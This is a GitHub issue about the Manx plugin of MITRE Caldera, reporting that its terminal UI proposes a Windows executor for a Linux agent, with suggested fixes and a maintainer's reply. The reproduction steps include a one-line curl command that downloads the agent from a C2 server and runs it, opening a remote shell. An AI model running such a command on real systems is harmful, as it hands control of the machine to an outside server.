### ISSUE TITLE
Terminal UI - command not corresponding to the agent's OS.

### ISSUE THREAD

**Issue by 2xyo** [mitre/manx#11]
Caldera version : 
```command
$ cd caldera && git rev-parse HEAD
6d9011358eef3041b4e60b64bf2f16f561be9d29
```

Steps to reproduce the issue:

- deploy a Manx agent on Linux Debian 10 
    ```console
    $ server="http://192.168.68.68:8888";socket="192.168.68.68:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go;chmod +x manx.go;./manx.go -http $server -socket $socket -contact $contact -v
    ```
  - On Web UI as red : campaigns -> agent  :  agent is up and running and well identify as linux
     ```
    Architecture | amd64
    Platform | linux
    ```
-  On Web UI as red :  plugins -> Manx
  - select the running agent
  - tactic : discovery 
  - technique : T1057 | Process Discovery
  - procedure : System processes 

Actual output, the windows executor is proposed : 
```powershell
Get-process
```

Expected output:
```bash
ps aux 
```
according to https://github.com/mitre/stockpile/blob/e60b281f176a9ceded9c58f5234d87f2ae817b32/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml#L19 

Suggested fix:
* https://github.com/mitre/manx/blob/4c4c844af9fc0d9a9d1e6b70c655c139e07b14c3/static/js/terminal.js#L173-L180 Do not display procedures that do not have an executor for the agent's OS.
*  https://github.com/mitre/manx/blob/4c4c844af9fc0d9a9d1e6b70c655c139e07b14c3/static/js/terminal.js#L182-L186 Do not use the first executor. Use an executor corresponding to the agent's OS.

**Comment by khyberspache** [comment]
Totally missed this.  I'll try to replicate and push a patch this weekend. @privateducky
